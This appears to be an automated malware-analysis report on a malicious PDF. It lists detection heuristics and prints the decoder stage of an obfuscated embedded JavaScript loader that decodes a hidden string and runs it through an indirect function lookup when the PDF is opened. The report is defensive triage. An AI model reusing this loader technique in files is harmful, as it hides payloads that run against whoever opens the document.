MALICIOUS
Risk Score: 134
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains an embedded JavaScript stream that is heavily obfuscated using String.fromCharCode. This obfuscation is a strong indicator of malicious intent, likely to download and execute a second-stage payload. The presence of JavaScript actions and embedded JS streams, along with the suspicious extracted artifact 'javascript_obj0008_000.js', supports this assessment.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
- JavaScript action (low, 2 related findings), PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical), PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  <</Type/Action/S/JavaScript/JS(\nfunction Vc5_j89\(_yM4\){var M7fp='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',HYXlt5P='',dQgdc2Nw,yOnCES,JTm2,O5d8Db8E,tvv,WoAu09Su,ijgo;for\(var noe86=0;noe86<_yM4.length;\){dQgdc2Nw=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);yOnCES=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);JTm2=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);O5d8Db8E=M7fp.indexOf\(_yM4.charAt\(noe86++\)\);tvv=\(dQgdc2Nw<<2\)+\(yOnCES>>4\);WoAu09Su=\(\(yOnCES&15\)<<4\)+\(JTm2>>2\);ijgo=\ …
- Embedded JS stream (low), PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (medium), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0x230 | 5734 bytes |

SHA-256: 0cfc7c1e3513e39ee7f21e90c57b12175a9607e7704836a34bd3892b9af9cffa

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 74 of 103 identifiers look randomly generated (e.g. 'zcWt9knxvs3FrfZJ8b7Nxa3yRe26ycGp8kXtusnB'), consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
function Vc5_j89(_yM4){var M7fp='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',HYXlt5P='',dQgdc2Nw,yOnCES,JTm2,O5d8Db8E,tvv,WoAu09Su,ijgo;for(var noe86=0;noe86<_yM4.length;){dQgdc2Nw=M7fp.indexOf(_yM4.charAt(noe86++));yOnCES=M7fp.indexOf(_yM4.charAt(noe86++));JTm2=M7fp.indexOf(_yM4.charAt(noe86++));O5d8Db8E=M7fp.indexOf(_yM4.charAt(noe86++));tvv=(dQgdc2Nw<<2)+(yOnCES>>4);WoAu09Su=((yOnCES&15)<<4)+(JTm2>>2);ijgo=((JTm2&3)<<6)+O5d8Db8E;HYXlt5P+=String.fromCharCode(tvv);if(JTm2!=64)HYXlt5P+=String.fromCharCode(WoAu09Su);if(O5d8Db8E!=64)HYXlt5P+=String.fromCharCode(ijgo);}
return HYXlt5P;}
function QL7ueTAX(A9qh2p,rA){var Kb8='',fz2W=0;for(yV=0;yV<A9qh2p.length;yV++){Kb8+=String.fromCharCode(A9qh2p.charCodeAt(yV)-rA.charCodeAt(fz2W++));if(fz2W>=rA.length)fz2W=0;}
return Kb8;}
vTaL80t7=QL7ueTAX(Vc5_j89('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'),this.producer);CWbv13=this.author;hwb1=this[CWbv13];hwb1(vTaL80t7);